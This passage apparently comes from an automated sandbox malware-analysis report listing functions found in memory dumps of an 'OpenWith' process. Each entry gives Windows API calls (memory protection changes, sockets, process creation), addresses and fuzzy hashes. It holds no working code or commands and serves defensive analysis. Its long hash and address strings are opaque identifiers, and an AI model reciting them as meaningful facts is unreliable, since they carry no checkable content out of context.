ioctlsocket.WS2_32 ref: 00007DF4E57810F4
CreateIoCompletionPort.KERNELBASE ref: 00007DF4E578112A
SetFileCompletionNotificationModes.KERNEL32 ref: 00007DF4E5781170

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: Completion$CreateFileModesNotificationPortioctlsocket
String ID:
API String ID: 1455841399-0
Opcode ID: ea0de95ab8d492ab321edf1cf0b460d03c03f83aa0a5be87d8e0918c001e10b9
Instruction ID: 0dbe6a706ec29965ea262cfc0463385c083b42192bd2387d24276515df54720a
Opcode Fuzzy Hash: ea0de95ab8d492ab321edf1cf0b460d03c03f83aa0a5be87d8e0918c001e10b9
Instruction Fuzzy Hash: CF31E630F289E44BFBA89B28988533A32F5EF45755F50007AE80FC2182DA29FC718691

Function 00007DF4E5829CE4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

X, xrefs: 00007DF4E5829CF5

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: dd1eb683c6085e0ecfa30d9a4467b72511ed2438d12db001a6c4900ef702a5e2
Instruction ID: c0ad9cfb556bb763cae6857cd51b95fc21299794104a092fc7fc48517e0b600a
Opcode Fuzzy Hash: dd1eb683c6085e0ecfa30d9a4467b72511ed2438d12db001a6c4900ef702a5e2
Instruction Fuzzy Hash: 7F719F74918B488FD768DF28D4852B67BE4FB48310B500A7FD89BC3692E734B492CB81

Function 00007DF4E5756DB4 Relevance: 3.4, APIs: 2, Instructions: 418COMMON

Download Yara Rule

APIs

_calloc_dbg.MSVCRT ref: 00007DF4E5756E3D
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E575722D

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@_calloc_dbg
String ID:
API String ID: 372180527-0
Opcode ID: 9a2ea265351feaa46dda64d763c3e0368ee2e1b826a7c18a8c1ab57413afc670
Instruction ID: 51feb736e3126e948a59df7cfa62f98512ee5e386295081875cfe1c23a4d33ba
Opcode Fuzzy Hash: 9a2ea265351feaa46dda64d763c3e0368ee2e1b826a7c18a8c1ab57413afc670
Instruction Fuzzy Hash: 65D12031A1CB884BE765EB149495BEB73F5FF94340F40093BE44FC3192EA78A9658782

Function 00007DF4E5747804 Relevance: 3.3, APIs: 2, Instructions: 316fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNELBASE ref: 00007DF4E5747A3A
MapViewOfFile.KERNELBASE ref: 00007DF4E5747A5D

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: File$CreateMappingView
String ID:
API String ID: 3452162329-0
Opcode ID: a1239ca2c7d0901c50ecb985e59448b401d93373a758a3857c6a487fda89f013
Instruction ID: 174c56e799b82a8100dd3ae5e22cab7f4d596ad80d54e180b834ed47234d97ca
Opcode Fuzzy Hash: a1239ca2c7d0901c50ecb985e59448b401d93373a758a3857c6a487fda89f013
Instruction Fuzzy Hash: 71A12F3161CA888FD755EF18D485AAAB7E1FFA4310F50462EE08FC7191DF38A955CB82

Function 00007DF4E5733564 Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4E573373C
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E57337E3

Part of subcall function 00007DF4E5733410: _malloc_dbg.MSVCRT ref: 00007DF4E57334DF

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg$??3@
String ID:
API String ID: 2216462316-0
Opcode ID: ac8e64687a13b889e1874be42d2c3ca0f1a614677750a284a612a131824c467f
Instruction ID: ddd396b13ecb8667fd8bddb3bb1ca8f51af82044e394a8f2f2c39fc3710baa14
Opcode Fuzzy Hash: ac8e64687a13b889e1874be42d2c3ca0f1a614677750a284a612a131824c467f
Instruction Fuzzy Hash: 5E719331A1C9884AE739A71898967FFB7E1FF85301F50457FE48FC2183DD38A9658682

Function 00007DF4E575BB24 Relevance: 3.2, APIs: 2, Instructions: 223fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4E575B870: _malloc_dbg.MSVCRT ref: 00007DF4E575B87A

CreateFileW.KERNELBASE ref: 00007DF4E575BCAE
ReadFile.KERNELBASE ref: 00007DF4E575BCE9

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: File$CreateRead_malloc_dbg
String ID:
API String ID: 2554620077-0
Opcode ID: 03ce3f1792e96e7ac83239bdf06a7880c3f13995b24428d9b922d5838031ffc1
Instruction ID: cdee0394ad010be741234db78d0ed772ed7017c704cde41796193b555c4afb81
Opcode Fuzzy Hash: 03ce3f1792e96e7ac83239bdf06a7880c3f13995b24428d9b922d5838031ffc1
Instruction Fuzzy Hash: 5C618570A1CB844FE7649F1898C577EB7E1FB98310F50053EE58FC3292DA38A9668642

Function 00007DF4E5747B40 Relevance: 3.2, APIs: 2, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007DF4E5747B98
ReadFile.KERNELBASE ref: 00007DF4E5747C4D

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
Opcode ID: f2947b7776ab78a12c8c0ba941454826cacc71e722e6591b51f93e464c8a8dbc
Instruction ID: 0c49fbe7168e5e8662f361467322c21ca085353a89675fc185321b26cc03d96d
Opcode Fuzzy Hash: f2947b7776ab78a12c8c0ba941454826cacc71e722e6591b51f93e464c8a8dbc
Instruction Fuzzy Hash: 1B41877170C6484FEB58EF28A88566B77E9FB99701F10053EE88FC3191EE24D9528782

Function 00007DF4E575131C Relevance: 3.1, APIs: 2, Instructions: 139COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4E57513AB
_malloc_dbg.MSVCRT ref: 00007DF4E57513EA

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: de4e33abc2b85d707b14ce31c2985da81c8d9c2e164d1120f04ddc1fc4c9d720
Instruction ID: 4fa7dd7c455d5296df00b0e7a6b8f0f81c75ba3bc2ec2d99e442fe0f18c98d54
Opcode Fuzzy Hash: de4e33abc2b85d707b14ce31c2985da81c8d9c2e164d1120f04ddc1fc4c9d720
Instruction Fuzzy Hash: 62416331608D0E8FDB94EF2CD888A6577E1FB68312B14467BD409C7655DB34E895CBC0

Function 00007DF4E574B2B8 Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4E5758AFC: NtAcceptConnectPort.NTDLL ref: 00007DF4E5758B0C

_malloc_dbg.MSVCRT ref: 00007DF4E574B366
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E574B3ED

Part of subcall function 00007DF4E5751570: _malloc_dbg.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF4E57700C6), ref: 00007DF4E575158F

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg$??3@AcceptConnectPort
String ID:
API String ID: 82011185-0
Opcode ID: 4ecf2b624d510c0b9105c9875737021730bb05f6acc8958d51b1f99a9df8c032
Instruction ID: e6a4824ecf48881872b7464146b670f56c4e1e882771f8ad6637de36df7be760
Opcode Fuzzy Hash: 4ecf2b624d510c0b9105c9875737021730bb05f6acc8958d51b1f99a9df8c032
Instruction Fuzzy Hash: DE414E70508B488FEB58EF59D8857A6B7E0FB58301F10456EE84EC7292DF34E895CB42

Function 00007DF4E575B710 Relevance: 3.1, APIs: 2, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007DF4E575B747
ReadFile.KERNELBASE ref: 00007DF4E575B77D

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
Opcode ID: 48d4499c65556443d648adb9fa57ce38d5327441d6ec0f9b9064251a26d7a124
Instruction ID: e6e4a68c5f4abb1984af1027773a6af445f5bb8a3f49bc5505c61708f9c0e8ef
Opcode Fuzzy Hash: 48d4499c65556443d648adb9fa57ce38d5327441d6ec0f9b9064251a26d7a124
Instruction Fuzzy Hash: CD21C770B0C7484FE3689E68988637B77D4EB89710F10053FE88FC2242DE64A9264696

Function 00007DF4E5744DFC Relevance: 3.1, APIs: 2, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007DF4E5744E42
VirtualProtect.KERNELBASE ref: 00007DF4E5744EBD

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: d1d5d62458b525b217cd191320538f3c548a21db8f8a8dd998a7d78b892a2355
Instruction ID: 042ff02eb16f3b750c8ef1cdf917ad97035bf36e6a5e4878ab4e0accbe176c82
Opcode Fuzzy Hash: d1d5d62458b525b217cd191320538f3c548a21db8f8a8dd998a7d78b892a2355
Instruction Fuzzy Hash: 1021A131218E484BDB58EB18D881FE6B3E5FB98310F00452AE54FC3281DE38E955C782

Function 00007DF4E582802C Relevance: 3.1, APIs: 2, Instructions: 89COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E58280C1
??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E58280CC

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
Instruction ID: f0fb48f15b5a7d5a99ba4ddc2ec72a8250e4df6dc8216b4e2208383a9197a262
Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
Instruction Fuzzy Hash: 94215174A089185FDF94EB5CD0C4E6A7BE1FF98310B6502A2D81AC7199D535EC90CB85

Function 000001F0D53B19A0 Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlRemoveVectoredExceptionHandler.NTDLL ref: 000001F0D53B19AD
VirtualFree.KERNELBASE ref: 000001F0D53B19E5

Memory Dump Source

Source File: 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D53B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f0d53b0000_OpenWith.jbxd

Similarity

API ID: ExceptionFreeHandlerRemoveVectoredVirtual
String ID:
API String ID: 3082376348-0
Opcode ID: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
Instruction ID: ed5958d2ca84a65e634bb47ff785b76bcf53959cbe1d54da5e520e9a01b4c390
Opcode Fuzzy Hash: 68a2bebb63dec11ebeb4fbf40c1c95563ebbd08489d40e2effbc7ec76ba53b27
Instruction Fuzzy Hash: 94F03A31214A098FDF9DEF95C8D5EF133A4EB28301F0401B9CC0ACB15ADA21E885C791

Function 00007DF4E5754550 Relevance: 2.4, APIs: 1, Instructions: 947COMMON

Download Yara Rule

APIs

_calloc_dbg.MSVCRT ref: 00007DF4E5754786

Part of subcall function 00007DF4E5756DB4: _calloc_dbg.MSVCRT ref: 00007DF4E5756E3D

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _calloc_dbg
String ID:
API String ID: 1170608187-0
Opcode ID: e90cc81eb408cc4c116749661e6ebe32c500f96c4223e82286aa9896b8545c58
Instruction ID: baa1d3dd41eadeabf5eb5442b67e7d1260a38d034ef1cd9f3959acb517e44abd
Opcode Fuzzy Hash: e90cc81eb408cc4c116749661e6ebe32c500f96c4223e82286aa9896b8545c58
Instruction Fuzzy Hash: 2972313091CB888BD769EB18D485BDAB3E1FF95300F50466EE48FC3296DE34A565C782

Function 00007DF4E5752E34 Relevance: 1.7, APIs: 1, Instructions: 245registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32 ref: 00007DF4E5753055

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d8340601590ed8b71669f7c6d40f22125e0dc7ab3cfec3bbe45ed9527f2fef5b
Instruction ID: 9ca90067ddeca3eb8737edd0ad0d2d7558dd64561b65cab7949b8c176adeeca4
Opcode Fuzzy Hash: d8340601590ed8b71669f7c6d40f22125e0dc7ab3cfec3bbe45ed9527f2fef5b
Instruction Fuzzy Hash: 8191BD3191CB888FEB64EF24C489B9AB7E1FB98301F10492EE48EC3260DB34D555CB42

Function 00007DF4E5781F58 Relevance: 1.7, APIs: 1, Instructions: 227networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32 ref: 00007DF4E578200F

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: e6bbb75cfcada6243a44a272e57bf7ceaccf3902ad7b4c735c76777bdf036997
Instruction ID: f2e152f0239a008ebea6705db025c2d750f08d57606844b21ebb1e45dd6912fb
Opcode Fuzzy Hash: e6bbb75cfcada6243a44a272e57bf7ceaccf3902ad7b4c735c76777bdf036997
Instruction Fuzzy Hash: 82815170A18B498FEB98DF28C484B66B7E0FF54315F50426AD84FC7691DB35E864CB81

Function 00007DF4E57441D8 Relevance: 1.7, APIs: 1, Instructions: 203COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE ref: 00007DF4E5744395

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 7301991a55ae90a18fd8a2167234c9b178d7ebdeea410f897018aea7b1691faa
Instruction ID: 4ee8f5505d853a213cdd1148e32f469086419476f15e886d5db038649c457466
Opcode Fuzzy Hash: 7301991a55ae90a18fd8a2167234c9b178d7ebdeea410f897018aea7b1691faa
Instruction Fuzzy Hash: 27613C7191CA888BD765EF64D8956EBB7E1FF94300F404A2EE08FC3191DE34A655CB42

Function 00007DF4E575B498 Relevance: 1.7, APIs: 1, Instructions: 176processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 00007DF4E575B591

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 830ad8bfff6d6a28aaa37f993cf9d2c89b1305a6e603a1f7e06b724cef07ffaf
Instruction ID: 78f62dcf9ff94ba15679004e8bab50542abde027e52ae86a3bed8ec51ea0525f
Opcode Fuzzy Hash: 830ad8bfff6d6a28aaa37f993cf9d2c89b1305a6e603a1f7e06b724cef07ffaf
Instruction Fuzzy Hash: 64512C30A0CB888BE768DF58D84577BB7E5FF94311F40052EE48FC3191DA78A9658B52

Function 00007DF4E5781950 Relevance: 1.7, APIs: 1, Instructions: 167networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32 ref: 00007DF4E57819EF

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: 6b887d4ee2da175949f8e81a0e65e3d063e47abc8ee875f5d1071da8520f6cd7
Instruction ID: 214cfc40ef5d7e75c6401220e9bb38b46ab01c179bfd5366d8b3f33638de3f57
Opcode Fuzzy Hash: 6b887d4ee2da175949f8e81a0e65e3d063e47abc8ee875f5d1071da8520f6cd7
Instruction Fuzzy Hash: 69512770608A998FEBA4DF29C488B96B7F0FF58314F51056AD44FC35A1EB39E864CB41

Function 00007DF4E5744532 Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E5744576

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: a77b9090cd06977d7ef09198279e321a9707609d0e95e43d8a47d634595593bd
Instruction ID: bc9fb9a035bbf7a214be1b95b692ea8f834d0d6871d38bb7fd0e373376742cdc
Opcode Fuzzy Hash: a77b9090cd06977d7ef09198279e321a9707609d0e95e43d8a47d634595593bd
Instruction Fuzzy Hash: DA41FE30618E488FDB95EF18C491BA6B3F2FF98311F60466AD44EC7195DA35F8A1CB81

Function 00007DF4E5746478 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4E5744EE8: VirtualProtect.KERNELBASE ref: 00007DF4E5744F48
Part of subcall function 00007DF4E5744EE8: VirtualProtect.KERNELBASE ref: 00007DF4E5744F71
Part of subcall function 00007DF4E5744EE8: VirtualProtect.KERNELBASE ref: 00007DF4E5744F8D
Part of subcall function 00007DF4E5744EE8: VirtualProtect.KERNELBASE ref: 00007DF4E5744FB8

TlsFree.KERNELBASE(?,?,?,?,?,?,?,00000000,?,?,00000000,00007DF4E574220C), ref: 00007DF4E57465B3

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ProtectVirtual$Free
String ID:
API String ID: 3841229516-0
Opcode ID: 5a5076ee5687eff1dc103e3f39fba0ea38ea43aa56cb8851756aaefb7e695dca
Instruction ID: 113d371c6e841b9bfcbb85ee2bf4bfb2905d02e89548a364aed0c77533f373cc
Opcode Fuzzy Hash: 5a5076ee5687eff1dc103e3f39fba0ea38ea43aa56cb8851756aaefb7e695dca
Instruction Fuzzy Hash: 86417830A1CA984FDB54EB29D4856AEB3B1FF45710F108576E41FC728ADE29EC318B81

Function 00007DF4E5733410 Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 00007DF4E57334DF

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: cc4326c6841866a6755c31003428b424b06f8f10db791a6fd7561e0a70c8a8fc
Instruction ID: b3aa025988c4ff6ab0d8c8e5218135a22ca2618cc0d108e90ad6c4d10ad523ad
Opcode Fuzzy Hash: cc4326c6841866a6755c31003428b424b06f8f10db791a6fd7561e0a70c8a8fc
Instruction Fuzzy Hash: 8C411730A084684BEB6CDE2988D453A37E1EF84711F1441BBCC5BCB187DA28E976C790

Function 00007DF4E580F7C8 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,000000EE,?,00007DF4E5806A27), ref: 00007DF4E580F8BA

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: b7098315abca8b4842ff54266f2fe7c997955c718cc6dddee93ebda984e4322e
Instruction ID: c1ad386911f2580f77b92342da5323ce793c762046dc0c9eedda6e75395f76db
Opcode Fuzzy Hash: b7098315abca8b4842ff54266f2fe7c997955c718cc6dddee93ebda984e4322e
Instruction Fuzzy Hash: 71416D30718E4D5FFB98AB689495BAB72A1FF58300F50413AD51FC3692DE28ECA18790

Function 00007DF4E5742110 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00007DF4E5732BD4: RtlAddFunctionTable.KERNEL32 ref: 00007DF4E5732C01

SetErrorMode.KERNELBASE ref: 00007DF4E57421F8

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ErrorFunctionModeTable
String ID:
API String ID: 928017140-0
Opcode ID: 3093e2713d4c83f778b6f58d544e1c428f7102d517b3c9af48ca3ee171aa4d06
Instruction ID: a0e470f1ff06e16f34605c596436a11ef8e692da2b9cfe01980cc6174c6da105
Opcode Fuzzy Hash: 3093e2713d4c83f778b6f58d544e1c428f7102d517b3c9af48ca3ee171aa4d06
Instruction Fuzzy Hash: 29316421B189984BEB54BB589882B7E72F1EF58310F50057FE50FC31D2DA18EDB68682

Function 00007DF4E5782700 Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007DF4E5782774

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 405079254f4dbac4a13797b27ee38af6170be3b6057a9a13f7f6cbe7f380fdd3
Instruction ID: de67597dc71f34798978f3865e3a7a2fa21cf51f5ba4c96e77ff240de643d0f9
Opcode Fuzzy Hash: 405079254f4dbac4a13797b27ee38af6170be3b6057a9a13f7f6cbe7f380fdd3
Instruction Fuzzy Hash: D8311E70A08A558FEB98DF19C48876177E1FF54329F5042BAD81ECB2E6D734D8A1CB40

Function 000001F0D53B185C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessMitigationPolicy.KERNELBASE ref: 000001F0D53B192F

Memory Dump Source

Source File: 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F0D53B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1f0d53b0000_OpenWith.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
Instruction ID: ffb45e228470660f013456d46a3318d1e2812f334b7f3ba989974ae571b5d566
Opcode Fuzzy Hash: 04359cd7b97b11c476e8c0617afcaa098c35e265ec660168a6fbd24c0647ca60
Instruction Fuzzy Hash: BA319130220A4B4AFB769BE8C9847F173D5EBD83A1F1C01B9C855CA1D2DE76D881D780

Function 00007DF4E5751570 Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF4E57700C6), ref: 00007DF4E575158F

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: 85d54cad85ff47129ab9247bbc33c91055469bc84fa60e6ee8ad48e3f09910ee
Instruction ID: b4b308f989f576f77e016e30e069764be8003ec31ec09431270d951d69f56068
Opcode Fuzzy Hash: 85d54cad85ff47129ab9247bbc33c91055469bc84fa60e6ee8ad48e3f09910ee
Instruction Fuzzy Hash: 5A219071614D0C8FDB48EF1CD88CBA577E5FBA831271442ABD80ECB265DA34E995CB90

Function 00007DF4E574BC58 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

_calloc_dbg.MSVCRT ref: 00007DF4E574BC91

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: _calloc_dbg
String ID:
API String ID: 1170608187-0
Opcode ID: e3c4e059fd7fb1bb303aa5abfb315f9ce789d96f3a96a8f28985f97effba153f
Instruction ID: 2ef80f4be95bc6e85c0c68b295d2a5bde0be1fe2a6c20a1eb731bc2d5eb4904f
Opcode Fuzzy Hash: e3c4e059fd7fb1bb303aa5abfb315f9ce789d96f3a96a8f28985f97effba153f
Instruction Fuzzy Hash: 8521A230518A4C9FDB58AF68D88AAB677E4FB98311F00416EE44EC3261EA75E951C7C2

Function 00007DF4E5754484 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 00007DF4E5754541

Memory Dump Source

Source File: 0000000F.00000003.2320471347.00007DF4E5731000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4E5731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_7df4e5731000_OpenWith.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 3adb1af045a857eedabd1a5fb2c5f83d930a0cc5c4d338f8207a2e6a29b170a8
Instruction ID: 0e8581474092b768026aec43efcbb28232ee861f7f5f79a6b61999d2e055c269
Opcode Fuzzy Hash: 3adb1af045a857eedabd1a5fb2c5f83d930a0cc5c4d338f8207a2e6a29b170a8
Instruction Fuzzy Hash: FD213031609A488FDF94EF29D8856AA77E1EF58325F00462AF84ED3151CB39E950CB91

Function 00007DF4E581335C Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

